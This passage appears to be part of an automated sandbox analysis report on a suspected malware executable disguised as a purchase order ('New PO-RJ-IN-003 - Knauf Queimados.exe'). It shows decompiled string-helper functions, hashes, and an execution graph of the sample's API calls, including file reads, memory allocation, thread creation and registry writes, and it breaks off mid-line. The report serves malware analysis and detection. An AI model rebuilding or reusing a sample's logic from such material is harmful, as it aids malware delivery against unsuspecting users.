                                                                                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,766DF560,00403690,00000000,00403482,00000000), ref: 004036D3
                                                                                                                          • GlobalFree.KERNEL32 ref: 004036DA
                                                                                                                          Strings
                                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004036CB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Free$GlobalLibrary
                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                          • API String ID: 1100898210-823278215
                                                                                                                          • Opcode ID: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
                                                                                                                          • Instruction ID: 7520a5cbb74b84659c3a5403b35965a418cfcd2fa6a259890695166e8a2f0d53
                                                                                                                          • Opcode Fuzzy Hash: e38f7b7ef76e64d847b72dc92418a1a22abc338dac8168bb5d5fc62d2911f828
                                                                                                                          • Instruction Fuzzy Hash: 53E08C3281142067C6315F0ABD0875A76AC6B45B26F018436E900B73A187756C438FDC
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405835 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405835(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}





                                                                                                                          0x00405836
                                                                                                                          0x00405840
                                                                                                                          0x00405842
                                                                                                                          0x00405849
                                                                                                                          0x00405851
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00405851
                                                                                                                          0x00405853
                                                                                                                          0x00405858

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe,C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe,80000000,00000003), ref: 0040583B
                                                                                                                          • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CF4,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe,C:\Users\user\Desktop\New PO-RJ-IN-003 - Knauf Queimados.exe,80000000,00000003), ref: 00405849
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CharPrevlstrlen
                                                                                                                          • String ID: C:\Users\user\Desktop
                                                                                                                          • API String ID: 2709904686-1246513382
                                                                                                                          • Opcode ID: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                          • Instruction ID: d70a425eade4063b78d7fa64a6a9160d8ae63170ea867be96e5b455a3914fe1f
                                                                                                                          • Opcode Fuzzy Hash: 49376fbf8c9c30057c1bc985cc011eea510fd351d3a644e674ee9e82abf7fe19
                                                                                                                          • Instruction Fuzzy Hash: 01D05E634189A02EE30376509C04B8B6A48CF12340F198462E940A2190C2784C418BAD
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00405947 Relevance: 5.0, APIs: 4, Instructions: 30stringCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00405947(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}






                                                                                                                          0x00405953
                                                                                                                          0x00405955
                                                                                                                          0x0040597d
                                                                                                                          0x00405962
                                                                                                                          0x00405967
                                                                                                                          0x00405972
                                                                                                                          0x00000000
                                                                                                                          0x0040598f
                                                                                                                          0x0040597b
                                                                                                                          0x0040597b
                                                                                                                          0x00000000

                                                                                                                          APIs
                                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040594E
                                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405967
                                                                                                                          • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405975
                                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B55,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040597E
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.311379785.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000000.00000002.311367620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311403343.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311443229.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311459049.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311508906.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311558346.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          • Associated: 00000000.00000002.311574736.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_400000_New PO-RJ-IN-003 - Knauf Queimados.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 190613189-0
                                                                                                                          • Opcode ID: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                                                                                                                          • Instruction ID: 50b9e356db97d407f8629b59342efd8dd4fdec4619503af860e0f04522e7a9f7
                                                                                                                          • Opcode Fuzzy Hash: b9005c049e247e33e5549b3e141599c62d2a38fed0f6fd2d3c1464f89547bebd
                                                                                                                          • Instruction Fuzzy Hash: C1F0A776209D51EFC2026B255C04D7BBF94EF91324B24057BF440F2180D3399815DBBB
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:1.2%
                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                          Signature Coverage:4.2%
                                                                                                                          Total number of Nodes:980
                                                                                                                          Total number of Limit Nodes:8
                                                                                                                          execution_graph 9759 250b75 9772 255b20 GetEnvironmentStringsW 9759->9772 9761 250b86 9762 250b8c 9761->9762 9763 250b98 9761->9763 9779 253703 9762->9779 9785 250c2e 9763->9785 9768 253703 __freea 14 API calls 9769 250bbc 9768->9769 9770 253703 __freea 14 API calls 9769->9770 9771 250bc2 9770->9771 9773 255b2f 9772->9773 9774 255b31 9772->9774 9773->9761 9807 25490e 9774->9807 9776 255b46 CatchIt 9777 253703 __freea 14 API calls 9776->9777 9778 255b60 FreeEnvironmentStringsW 9777->9778 9778->9761 9780 25370e HeapFree 9779->9780 9781 250b92 9779->9781 9780->9781 9782 253723 GetLastError 9780->9782 9783 253730 __freea 9782->9783 9784 254824 ___std_exception_copy 12 API calls 9783->9784 9784->9781 9787 250c4d 9785->9787 9786 2548b1 _unexpected 14 API calls 9788 250c8d 9786->9788 9787->9786 9789 250c95 9788->9789 9799 250c9f 9788->9799 9790 253703 __freea 14 API calls 9789->9790 9792 250b9f 9790->9792 9791 250d14 9793 253703 __freea 14 API calls 9791->9793 9792->9768 9793->9792 9794 2548b1 _unexpected 14 API calls 9794->9799 9795 250d24 10037 250bff 9795->10037 9799->9791 9799->9794 9799->9795 9801 250d3f 9799->9801 9803 253703 __freea 14 API calls 9799->9803 10028 25495c 9799->10028 9800 253703 __freea 14 API calls 9802 250d32 9800->9802 10043 2537e6 IsProcessorFeaturePresent 9801->10043 9805 253703 __freea 14 API calls 9802->9805 9803->9799 9805->9792 9806 250d4b 9808 25494c 9807->9808 9813 25491c _unexpected 9807->9813 9817 254824 9808->9817 9809 254937 RtlAllocateHeap 9811 25494a 9809->9811 9809->9813 9811->9776 9813->9808 9813->9809 9814 253a3f 9813->9814 9820 253a7b 9814->9820 9831 25277d GetLastError 9817->9831 9819 254829 9819->9811 9821 253a87 __FrameHandler3::FrameUnwindToState 9820->9821 9826 25259d EnterCriticalSection 9821->9826 9823 253a92 9827 253ace 9823->9827 9826->9823 9830 2525b4 LeaveCriticalSection 9827->9830 9829 253a4a 9829->9813 9830->9829 9832 252793 9831->9832 9833 252799 9831->9833 9854 25220f 9832->9854 9837 25279d SetLastError 9833->9837 9859 25224e 9833->9859 9837->9819 9841 2527e3 9844 25224e _unexpected 6 API calls 9841->9844 9842 2527d2 9843 25224e _unexpected 6 API calls 9842->9843 9845 2527e0 9843->9845 9846 2527ef 9844->9846 9851 253703 __freea 12 API calls 9845->9851 9847 2527f3 9846->9847 9848 25280a 9846->9848 9850 25224e _unexpected 6 API calls 9847->9850 9871 25293d 9848->9871 9850->9845 9851->9837 9853 253703 __freea 12 API calls 9853->9837 9876 252474 9854->9876 9856 25222b 9857 252234 9856->9857 9858 252246 TlsGetValue 9856->9858 9857->9833 9860 252474 _unexpected 5 API calls 9859->9860 9861 25226a 9860->9861 9862 252273 9861->9862 9863 252288 TlsSetValue 9861->9863 9862->9837 9864 2548b1 9862->9864 9870 2548be _unexpected 9864->9870 9865 2548fe 9867 254824 ___std_exception_copy 13 API calls 9865->9867 9866 2548e9 HeapAlloc 9868 2527ca 9866->9868 9866->9870 9867->9868 9868->9841 9868->9842 9869 253a3f _unexpected 2 API calls 9869->9870 9870->9865 9870->9866 9870->9869 9890 252aa3 9871->9890 9877 2524a2 9876->9877 9881 25249e _unexpected 9876->9881 9877->9881 9882 2523a9 9877->9882 9880 2524bc GetProcAddress 9880->9881 9881->9856 9888 2523ba ___vcrt_FlsGetValue 9882->9888 9883 252450 9883->9880 9883->9881 9884 2523d8 LoadLibraryExW 9885 252457 9884->9885 9886 2523f3 GetLastError 9884->9886 9885->9883 9887 252469 FreeLibrary 9885->9887 9886->9888 9887->9883 9888->9883 9888->9884 9889 252426 LoadLibraryExW 9888->9889 9889->9885 9889->9888 9891 252aaf __FrameHandler3::FrameUnwindToState 9890->9891 9904 25259d EnterCriticalSection 9891->9904 9893 252ab9 9905 252ae9 9893->9905 9896 252af5 9897 252b01 __FrameHandler3::FrameUnwindToState 9896->9897 9909 25259d EnterCriticalSection 9897->9909 9899 252b0b 9910 2528f2 9899->9910 9901 252b23 9914 252b43 9901->9914 9904->9893 9908 2525b4 LeaveCriticalSection 9905->9908 9907 2529ab 9907->9896 9908->9907 9909->9899 9911 252928 _unexpected 9910->9911 9912 252901 _unexpected 9910->9912 9911->9901 9912->9911 9917 254dc4 9912->9917 10027 2525b4 LeaveCriticalSection 9914->10027 9916 252815 9916->9853 9918 254e44 9917->9918 9922 254dda 9917->9922 9919 254e92 9918->9919 9921 253703 __freea 14 API calls 9918->9921 9985 254f5e 9919->9985 9923 254e66 9921->9923 9922->9918 9924 254e0d 9922->9924 9929 253703 __freea 14 API calls 9922->9929 9925 253703 __freea 14 API calls 9923->9925 9926 254e2f 9924->9926 9931 253703 __freea 14 API calls 9924->9931 9927 254e79 9925->9927 9928 253703 __freea 14 API calls 9926->9928 9930 253703 __freea 14 API calls 9927->9930 9932 254e39 9928->9932 9934 254e02 9929->9934 9937 254e87 9930->9937 9938 254e24 9931->9938 9939 253703 __freea 14 API calls 9932->9939 9933 254f00 9940 253703 __freea 14 API calls 9933->9940 9945 2545b4 9934->9945 9935 254ea0 9935->9933 9943 253703 14 API calls __freea 9935->9943 9941 253703 __freea 14 API calls 9937->9941 9973 2546b2 9938->9973 9939->9918 9944 254f06 9940->9944 9941->9919 9943->9935 9944->9911 9946 2545c5 9945->9946 9972 2546ae 9945->9972 9947 253703 __freea 14 API calls 9946->9947 9948 2545d6 9946->9948 9947->9948 9949 2545e8 9948->9949 9950 253703 __freea 14 API calls 9948->9950 9951 2545fa 9949->9951 9953 253703 __freea 14 API calls 9949->9953 9950->9949 9952 25460c 9951->9952 9954 253703 __freea 14 API calls 9951->9954 9955 25461e 9952->9955 9956 253703 __freea 14 API calls 9952->9956 9953->9951 9954->9952 9957 254630 9955->9957 9958 253703 __freea 14 API calls 9955->9958 9956->9955 9959 254642 9957->9959 9961 253703 __freea 14 API calls 9957->9961 9958->9957 9960 254654 9959->9960 9962 253703 __freea 14 API calls 9959->9962 9963 254666 9960->9963 9964 253703 __freea 14 API calls 9960->9964 9961->9959 9962->9960 9965 254678 9963->9965 9966 253703 __freea 14 API calls 9963->9966 9964->9963 9967 25468a 9965->9967 9969 253703 __freea 14 API calls 9965->9969 9966->9965 9968 25469c 9967->9968 9970 253703 __freea 14 API calls 9967->9970 9971 253703 __freea 14 API calls 9968->9971 9968->9972 9969->9967 9970->9968 9971->9972 9972->9924 9974 2546bf 9973->9974 9975 254717 9973->9975 9976 2546cf 9974->9976 9977 253703 __freea 14 API calls 9974->9977 9975->9926 9978 2546e1 9976->9978 9979 253703 __freea 14 API calls 9976->9979 9977->9976 9980 2546f3 9978->9980 9981 253703 __freea 14 API calls 9978->9981 9979->9978 9982 254705 9980->9982 9983 253703 __freea 14 API calls 9980->9983 9981->9980 9982->9975 9984 253703 __freea 14 API calls 9982->9984 9983->9982 9984->9975 9986 254f6b 9985->9986 9990 254f8a 9985->9990 9986->9990 9991 25471b 9986->9991 9989 253703 __freea 14 API calls 9989->9990 9990->9935 9992 2547f9 9991->9992 9993 25472c 9991->9993 9992->9989 9994 2547ff _unexpected 14 API calls 9993->9994 9995 254734 9994->9995 9996 2547ff _unexpected 14 API calls 9995->9996 9997 25473f 9996->9997 9998 2547ff _unexpected 14 API calls 9997->9998 9999 25474a 9998->9999 10000 2547ff _unexpected 14 API calls 9999->10000 10001 254755 10000->10001 10002 2547ff _unexpected 14 API calls 10001->10002 10003 254763 10002->10003 10004 253703 __freea 14 API calls 10003->10004 10005 25476e 10004->10005 10006 253703 __freea 14 API calls 10005->10006 10007 254779 10006->10007 10008 253703 __freea 14 API calls 10007->10008 10009 254784 10008->10009 10010 2547ff _unexpected 14 API calls 10009->10010 10011 254792 10010->10011 10012 2547ff _unexpected 14 API calls 10011->10012 10013 2547a0 10012->10013 10014 2547ff _unexpected 14 API calls 10013->10014 10015 2547b1 10014->10015 10016 2547ff _unexpected 14 API calls 10015->10016 10017 2547bf 10016->10017 10018 2547ff _unexpected 14 API calls 10017->10018 10019 2547cd 10018->10019 10020 253703 __freea 14 API calls 10019->10020 10021 2547d8 10020->10021 10022 253703 __freea 14 API calls 10021->10022 10023 2547e3 10022->10023 10024 253703 __freea 14 API calls 10023->10024 10025 2547ee 10024->10025 10026 253703 __freea 14 API calls 10025->10026 10026->9992 10027->9916 10029 254978 10028->10029 10030 25496a 10028->10030 10031 254824 ___std_exception_copy 14 API calls 10029->10031 10030->10029 10035 254992 10030->10035 10032 254982 10031->10032 10047 2537d6 10032->10047 10034 25498c 10034->9799 10035->10034 10036 254824 ___std_exception_copy 14 API calls 10035->10036 10036->10032 10038 250c0c 10037->10038 10042 250c29 10037->10042 10039 250c23 10038->10039 10040 253703 __freea 14 API calls 10038->10040 10041 253703 __freea 14 API calls 10039->10041 10040->10038 10041->10042 10042->9800 10044 2537f2 10043->10044 10092 25381a 10044->10092 10050 253a08 10047->10050 10049 2537e2 10049->10034 10051 253a1a ___std_exception_copy 10050->10051 10054 253962 10051->10054 10053 253a32 ___std_exception_copy 10053->10049 10055 253972 10054->10055 10056 253979 10054->10056 10063 251530 GetLastError 10055->10063 10058 253987 10056->10058 10067 2539df 10056->10067 10058->10053 10060 2539ae 10060->10058 10061 2537e6 ___std_exception_copy 11 API calls 10060->10061 10062 2539de 10061->10062 10064 251549 10063->10064 10070 25282e 10064->10070 10068 253a03 10067->10068 10069 2539ea GetLastError SetLastError 10067->10069 10068->10060 10069->10060 10071 252841 10070->10071 10072 252847 10070->10072 10074 25220f _unexpected 6 API calls 10071->10074 10073 25224e _unexpected 6 API calls 10072->10073 10090 251565 SetLastError 10072->10090 10075 252861 10073->10075 10074->10072 10076 2548b1 _unexpected 14 API calls 10075->10076 10075->10090 10077 252871 10076->10077 10078 25288e 10077->10078 10079 252879 10077->10079 10080 25224e _unexpected 6 API calls 10078->10080 10081 25224e _unexpected 6 API calls 10079->10081 10082 25289a 10080->10082 10083 252885 10081->10083 10084 2528ad 10082->10084 10085 25289e 10082->10085 10088 253703 __freea 14 API calls 10083->10088 10087 25293d _unexpected 14 API calls 10084->10087 10086 25224e _unexpected 6 API calls 10085->10086 10086->10083 10089 2528b8 10087->10089 10088->10090 10091 253703 __freea 14 API calls 10089->10091 10090->10056 10091->10090 10093 253836 __FrameHandler3::FrameUnwindToState 10092->10093 10094 253862 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10093->10094 10095 253933 __FrameHandler3::FrameUnwindToState 10094->10095 10098 24db65 10095->10098 10097 253807 GetCurrentProcess TerminateProcess 10097->9806 10099 24db6d 10098->10099 10100 24db6e IsProcessorFeaturePresent 10098->10100 10099->10097 10102 24db88 10100->10102 10105 24dc6d SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 10102->10105 10104 24dc6b 10104->10097 10105->10104 10106 24d1f0 10107 24d1fc __FrameHandler3::FrameUnwindToState 10106->10107 10132 24d49b 10107->10132 10109 24d203 10110 24d356 10109->10110 10121 24d22d ___scrt_is_nonwritable_in_current_image __FrameHandler3::FrameUnwindToState ___scrt_release_startup_lock 10109->10121 10193 24d76c IsProcessorFeaturePresent 10110->10193 10112 24d35d 10197 24ff9a 10112->10197 10117 24d24c 10118 24d2cd 10140 24d6e8 10118->10140 10120 24d2d3 10144 2418d0 10120->10144 10121->10117 10121->10118 10176 24ffe4 10121->10176 10127 24d2f3 10128 24d2fc 10127->10128 10184 24ffc6 10127->10184 10187 24d4d4 10128->10187 10133 24d4a4 10132->10133 10203 24d985 IsProcessorFeaturePresent 10133->10203 10137 24d4b5 10138 24d4b9 10137->10138 10213 24deae 10137->10213 10138->10109 10273 24fc70 10140->10273 10143 24d70e 10143->10120 10145 241932 __FrameHandler3::FrameUnwindToState ___std_exception_copy 10144->10145 10146 241966 CreateFileW GetFileSize VirtualAlloc ReadFile 10145->10146 10171 24193f 10145->10171 10147 241a20 EnumSystemCodePagesW 10146->10147 10275 250f8d 10147->10275 10152 241ec1 10152->10171 10278 2420c0 10152->10278 10153 241b9a __FrameHandler3::FrameUnwindToState 10153->10152 10153->10171 10173 251381 42 API calls 10153->10173 10155 241f20 10156 241f47 GetStdHandle GetStdHandle 10155->10156 10157 241fe3 10155->10157 10155->10171 10159 241f7e 10156->10159 10294 242420 GetACP TranslateCharsetInfo 10157->10294 10161 241fcf 10159->10161 10282 2422f0 10159->10282 10322 2429c0 10161->10322 10163 242009 GetStartupInfoW 10165 242026 10163->10165 10306 242790 10165->10306 10166 241fa9 10290 242380 10166->10290 10182 24d719 GetModuleHandleW 10171->10182 10173->10153 10174 241fc3 10174->10171 10177 24fffa __FrameHandler3::FrameUnwindToState _unexpected 10176->10177 10177->10118 10656 25262c GetLastError 10177->10656 10183 24d2ef 10182->10183 10183->10112 10183->10127 10742 250131 10184->10742 10188 24d4e0 10187->10188 10189 24d304 10188->10189 10817 24fea9 10188->10817 10189->10117 10191 24d4ee 10192 24deae ___scrt_uninitialize_crt 7 API calls 10191->10192 10192->10189 10194 24d782 __FrameHandler3::FrameUnwindToState 10193->10194 10195 24d82d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 10194->10195 10196 24d878 __FrameHandler3::FrameUnwindToState 10195->10196 10196->10112 10198 250131 __FrameHandler3::FrameUnwindToState 23 API calls 10197->10198 10199 24d363 10198->10199 10200 24ffb0 10199->10200 10201 250131 __FrameHandler3::FrameUnwindToState 23 API calls 10200->10201 10202 24d36b 10201->10202 10204 24d4b0 10203->10204 10205 24de8f 10204->10205 10219 251de7 10205->10219 10207 24de98 10207->10137 10210 24dea0 10211 24deab 10210->10211 10233 251e23 10210->10233 10211->10137 10214 24deb7 10213->10214 10215 24dec1 10213->10215 10216 251c93 ___vcrt_uninitialize_ptd 6 API calls 10214->10216 10215->10138 10217 24debc 10216->10217 10218 251e23 ___vcrt_uninitialize_locks DeleteCriticalSection 10217->10218 10218->10215 10221 251df0 10219->10221 10222 251e19 10221->10222 10223 24de94 10221->10223 10237 25607f 10221->10237 10224 251e23 ___vcrt_uninitialize_locks DeleteCriticalSection 10222->10224 10223->10207 10225 251c60 10223->10225 10224->10223 10254 255f90 10225->10254 10230 251c90 10230->10210 10232 251c75 10232->10210 10234 251e4d 10233->10234 10235 251e2e 10233->10235 10234->10207 10236 251e38 DeleteCriticalSection 10235->10236 10236->10234 10236->10236 10242 256111 10237->10242 10240 2560b7 InitializeCriticalSectionAndSpinCount 10241 2560a2 10240->10241 10241->10221 10243 256099 10242->10243 10246 256132 10242->10246 10243->10240 10243->10241 10244 25619a GetProcAddress 10244->10243 10246->10243 10246->10244 10247 25618b 10246->10247 10249 2560c6 LoadLibraryExW 10246->10249 10247->10244 10248 256193 FreeLibrary 10247->10248 10248->10244 10250 2560dd GetLastError 10249->10250 10251 25610d 10249->10251 10250->10251 10252 2560e8 ___vcrt_FlsGetValue 10250->10252 10251->10246 10252->10251 10253 2560fe LoadLibraryExW 10252->10253 10253->10246 10255 256111 ___vcrt_FlsGetValue 5 API calls 10254->10255 10256 255faa 10255->10256 10257 255fc3 TlsAlloc 10256->10257 10258 251c6a 10256->10258 10258->10232 10259 256041 10258->10259 10260 256111 ___vcrt_FlsGetValue 5 API calls 10259->10260 10261 25605b 10260->10261 10262 256076 TlsSetValue 10261->10262 10263 251c83 10261->10263 10262->10263 10263->10230 10264 251c93 10263->10264 10265 251c9d 10264->10265 10266 251ca3 10264->10266 10268 255fcb 10265->10268 10266->10232 10269 256111 ___vcrt_FlsGetValue 5 API calls 10268->10269 10270 255fe5 10269->10270 10271 255ff1 10270->10271 10272 255ffd TlsFree 10270->10272 10271->10266 10272->10271 10274 24d6fb GetStartupInfoW 10273->10274 10274->10143 10276 253703 __freea 14 API calls 10275->10276 10277 241b40 GetOEMCP 10276->10277 10277->10153 10280 2420e6 __FrameHandler3::FrameUnwindToState ___std_exception_copy 10278->10280 10279 2420f2 CatchIt 10279->10155 10280->10279 10281 250f8d ___std_exception_copy 14 API calls 10280->10281 10281->10279 10283 242306 10282->10283 10284 241f99 10282->10284 10335 2474c0 10283->10335 10284->10161 10284->10166 10286 242323 10342 247970 10286->10342 10289 2474c0 4 API calls 10289->10284 10291 2423a5 10290->10291 10292 241fb7 10290->10292 10291->10292 10293 2423b5 CreateThread 10291->10293 10292->10161 10292->10174 10293->10292 10295 242477 GetStartupInfoW 10294->10295 10296 241ff1 10294->10296 10300 2424a8 ___std_exception_copy 10295->10300 10296->10163 10296->10174 10298 2425b5 GetModuleHandleW LoadIconW 10301 242675 GetStockObject RegisterClassW CreateWindowExW 10298->10301 10300->10296 10356 2433b0 10300->10356 10301->10296 10302 24273e 10301->10302 10303 24275e 10302->10303 10359 244980 10302->10359 10365 244af0 10303->10365 10307 2427b3 ___std_exception_copy CatchIt 10306->10307 10308 250f8d ___std_exception_copy 14 API calls 10307->10308 10310 242042 ShowWindow 10307->10310 10309 242812 10308->10309 10312 2474c0 4 API calls 10309->10312 10321 242973 10309->10321 10310->10161 10311 242986 SetWindowTextW 10311->10310 10313 24284b 10312->10313 10314 24286e WideCharToMultiByte 10313->10314 10316 2428cc 10314->10316 10315 242948 10317 2474c0 4 API calls 10315->10317 10316->10315 10318 242904 WideCharToMultiByte 10316->10318 10319 242965 10317->10319 10318->10315 10320 2473e0 4 API calls 10319->10320 10320->10321 10321->10310 10321->10311 10323 2429e5 CreateEventW 10322->10323 10324 242a27 10322->10324 10323->10324 10334 242a1b 10323->10334 10324->10334 10648 248c60 10324->10648 10326 242b30 MsgWaitForMultipleObjects 10328 242aab 10326->10328 10327 242b68 WaitForMultipleObjects 10327->10328 10328->10326 10328->10327 10329 242ba9 PeekMessageW 10328->10329 10330 242c36 EnterCriticalSection 10328->10330 10333 242bf9 DispatchMessageW 10328->10333 10328->10334 10329->10328 10652 248cd0 10330->10652 10333->10329 10334->10171 10336 2474da 10335->10336 10341 2474ea CatchIt 10335->10341 10338 247511 10336->10338 10336->10341 10351 2475f0 10336->10351 10339 247586 WriteFile 10338->10339 10338->10341 10340 2475c7 GetLastError 10339->10340 10339->10341 10340->10341 10341->10286 10343 247996 10342->10343 10348 247a4a _strlen 10342->10348 10345 247a52 10343->10345 10347 2479a5 _strlen 10343->10347 10344 24233f 10344->10289 10346 2474c0 4 API calls 10345->10346 10346->10348 10349 2474c0 4 API calls 10347->10349 10348->10344 10350 2474c0 4 API calls 10348->10350 10349->10348 10350->10344 10352 24760a 10351->10352 10354 24761a 10351->10354 10353 24761f WriteFile 10352->10353 10352->10354 10353->10354 10355 247669 GetLastError 10353->10355 10354->10338 10355->10354 10357 2433d9 __FrameHandler3::FrameUnwindToState CatchIt 10356->10357 10358 2433fb GetDpiForSystem MulDiv GetDpiForSystem MulDiv 10357->10358 10358->10298 10362 2449ae __FrameHandler3::FrameUnwindToState 10359->10362 10360 2449e6 EnumFontFamiliesExW 10361 244a29 CatchIt 10360->10361 10360->10362 10377 24c3f0 10361->10377 10362->10360 10362->10361 10364 244adf 10364->10303 10368 244b13 __FrameHandler3::FrameUnwindToState ___std_exception_copy 10365->10368 10366 244ced CatchIt 10369 244f16 10366->10369 10425 242d20 10366->10425 10368->10366 10372 244cdc 10368->10372 10374 250f8d ___std_exception_copy 14 API calls 10368->10374 10429 248eb0 10369->10429 10375 250f8d ___std_exception_copy 14 API calls 10372->10375 10374->10368 10375->10366 10378 24c464 10377->10378 10379 24c406 RegCreateKeyW 10377->10379 10381 24c500 28 API calls 10378->10381 10380 24c431 10379->10380 10382 24c42c RegCloseKey 10379->10382 10386 24c500 10380->10386 10381->10382 10382->10364 10387 24c51e 10386->10387 10388 24c536 10386->10388 10389 2433b0 4 API calls 10387->10389 10390 24c621 10388->10390 10391 24c596 wsprintfW RegSetValueExW 10388->10391 10389->10388 10392 24c63d RegSetValueExW 10390->10392 10393 24c686 10390->10393 10391->10388 10392->10393 10394 24c6a2 RegSetValueExW 10393->10394 10395 24c6eb 10393->10395 10394->10395 10396 24c707 RegSetValueExW 10395->10396 10397 24c753 10395->10397 10396->10397 10398 24c75d lstrcmpW 10397->10398 10399 24c78a lstrlenW RegSetValueExW 10397->10399 10398->10399 10400 24c7e0 10398->10400 10399->10400 10401 24c7fc RegSetValueExW 10400->10401 10402 24c848 10400->10402 10401->10402 10403 24c876 GetDpiForSystem MulDiv GetDpiForSystem MulDiv RegSetValueExW 10402->10403 10404 